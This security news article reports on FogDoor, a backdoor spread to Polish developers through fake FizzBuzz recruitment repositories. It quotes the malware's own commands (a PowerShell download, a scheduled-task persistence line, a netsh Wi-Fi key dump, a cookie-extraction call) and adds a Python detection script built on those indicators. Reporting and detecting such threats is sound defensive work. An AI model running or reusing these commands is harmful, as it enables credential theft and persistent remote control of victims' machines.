Developers Beware! Fake Coding Challenges Will Deploy FogDoor on Your System

A sophisticated malware campaign targeting software developers has emerged, leveraging fake coding challenges to infiltrate systems with a stealthy backdoor dubbed FogDoor.
First identified in March 2025, this threat specifically targets Polish-speaking developers and job seekers through socially engineered GitHub repositories masquerading as technical recruitment assessments.
The malware’s multi-stage infection chain bypasses conventional security measures by exploiting developers’ familiarity with coding exercises, weaponizing their trust in industry-standard interview practices like the FizzBuzz test.
The attack begins with a GitHub repository named “FizzBuzz” under the account “Rekrutacja-JS” (Polish for “Recruitment-JS”), hosting an ISO file labeled “Zadanie rekrutacyjne.iso” (“Recruitment Task”).
This file contains a flawed JavaScript FizzBuzz implementation and a malicious Windows shortcut (README.lnk).
When executed, the shortcut triggers a PowerShell script that deploys FogDoor, establishing persistence, exfiltrating sensitive data, and enabling remote command execution.
Cyble Research and Intelligence Labs (CRIL) identified this campaign on March 10, 2025, noting its precision in geofencing attacks to Poland and nearby regions with Polish-speaking populations.
FogDoor distinguishes itself through its evasion-centric architecture.
Instead of traditional command-and-control (C&C) servers, it retrieves instructions from a social media profile on bark.lgbt via API calls and uses ephemeral webhook services like webhookbin.net for data exfiltration.
This approach complicates attribution and infrastructure takedowns. The malware’s payload, SkyWatchWeather.exe, mimics legitimate software while systematically harvesting browser cookies, Wi-Fi credentials, and system metadata.
Infection Mechanism and Execution Flow
The attack’s success hinges on its exploitation of developer workflows.
Upon mounting the ISO file, victims encounter FizzBuzz.js—a purposefully defective script designed to prompt debugging—and README.lnk, disguised as a documentation file.
Executing the LNK file launches a PowerShell script (SHA-256: 33bc5fa9798219ba6d4e31f91ec23982596c409e0fd73e2c0c33c70538b7ec83) that orchestrates the infection:
$url = "hxxps://files.catbox.moe/umh6no.txt"
Invoke-WebRequest -Uri $url -OutFile "$env:USERPROFILE\README.txt"
Start-Process notepad.exe "$env:USERPROFILE\README.txt"
This script first deploys a decoy README.txt containing faux debugging instructions to avoid suspicion.
Concurrently, it downloads SkyWatchWeather.exe from a compromised GitHub repository, saving it to C:\Users\Public\Downloads.
A scheduled task named “Weather Widget” ensures persistence, reactivating the malware every two minutes via:
schtasks /create /tn "Weather Widget" /tr "mshta vbscript:Execute(...)" /sc minute /mo 2
FogDoor then initiates geolocation checks using wttr.in’s weather API, terminating execution if the victim’s country isn’t Poland.
For verified targets, it accesses the TA’s social media profile via hxxps://bark.lgbt/api/v1/accounts/lookup?acct=Pawsitive Vibes to retrieve embedded commands.
These instructions execute via:
Network.getAllCookies().then(cookies => { chrome.cookies.export(cookies); });
This remote debugging technique extracts Chrome cookies, while Firefox credentials are copied from %AppData%\Roaming\Mozilla\Firefox\Profiles.
Wi-Fi passwords are harvested using:
netsh wlan show profile name="$name" key=clear >> %userprofile%\data\wifi.txt
Stolen data is compressed into data.zip and uploaded to filebin.net using a MachineGUID-derived URL, followed by a cleanup routine that deletes staging files and temporary webhook traces.
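The stages above leave distinctive traces in process and proxy telemetry. The following detection example, added here and not taken from Cyble or the article, turns those indicators into rules and flags a host only when several stages of the chain line up; the rule names and the event fields (host, cmdline, url) are assumptions about what an EDR or web proxy would log.

```python
import re
from collections import defaultdict

# Added detection example built from the FogDoor indicators described above (not Cyble's
# or the article's code). Rule names and event fields (host, cmdline, url) are assumptions.
RULES = [
    ("lnk_powershell_catbox_download", "cmdline",
     re.compile(r"invoke-webrequest.*files\.catbox\.moe", re.I)),
    ("skywatch_in_public_downloads", "cmdline",
     re.compile(r"c:\\users\\public\\downloads\\skywatchweather\.exe", re.I)),
    ("schtasks_mshta_vbscript_every_2min", "cmdline",
     re.compile(r"schtasks\s+/create.*mshta\s+vbscript:execute.*/sc\s+minute\s+/mo\s+2", re.I)),
    ("netsh_wifi_key_clear", "cmdline",
     re.compile(r"netsh\s+wlan\s+show\s+profile.*key=clear", re.I)),
    ("geofence_wttr_in_lookup", "url", re.compile(r"https?://wttr\.in/", re.I)),
    ("bark_lgbt_account_lookup", "url",
     re.compile(r"bark\.lgbt/api/v1/accounts/lookup", re.I)),
    ("webhookbin_or_filebin_exfil", "url",
     re.compile(r"(webhookbin\.net|filebin\.net)", re.I)),
]

def match_event(event):
    """Names of every rule whose field/regex pair matches this one event."""
    hits = []
    for name, field, pattern in RULES:
        value = event.get(field, "")
        if value and pattern.search(value):
            hits.append(name)
    return hits

def triage_hosts(events, min_rules=2):
    """Distinct rule hits per host; only hosts with >= min_rules are reported, so a
    lone wttr.in visit (a developer checking the weather) does not page anyone."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(match_event(ev))
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_rules}

# Constructed sample telemetry (not real logs): dev-01 shows the chain, dev-02 is benign.
SAMPLE_EVENTS = [
    {"host": "dev-01", "cmdline": "powershell Invoke-WebRequest -Uri "
     "https://files.catbox.moe/umh6no.txt -OutFile C:\\Users\\jan\\README.txt"},
    {"host": "dev-01", "cmdline": "C:\\Users\\Public\\Downloads\\SkyWatchWeather.exe"},
    {"host": "dev-01", "cmdline": 'schtasks /create /tn "Weather Widget" '
     '/tr "mshta vbscript:Execute(...)" /sc minute /mo 2'},
    {"host": "dev-01", "url": "https://wttr.in/"},
    {"host": "dev-01", "cmdline": 'netsh wlan show profile name="Office" key=clear'},
    {"host": "dev-02", "url": "https://wttr.in/"},
    {"host": "dev-02", "cmdline": "schtasks /query /tn Backup"},
]
```

Running triage_hosts(SAMPLE_EVENTS) reports only dev-01, with five of the seven rules tripped; dev-02 surfaces only if the threshold is lowered to a single rule.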
Cyble analysts emphasize that this multi-layered approach—combining social engineering, geofencing, and ephemeral C&C channels—enables FogDoor to operate undetected across development environments.
As FogDoor’s operators expand their tactics to include invoice-themed lures, organizations must prioritize security training and deploy behavioral analytics to counter such socially engineered threats.
The post Developers Beware! Fake Coding Challenges Will Deploy FogDoor on Your System appeared first on Cyber Security News.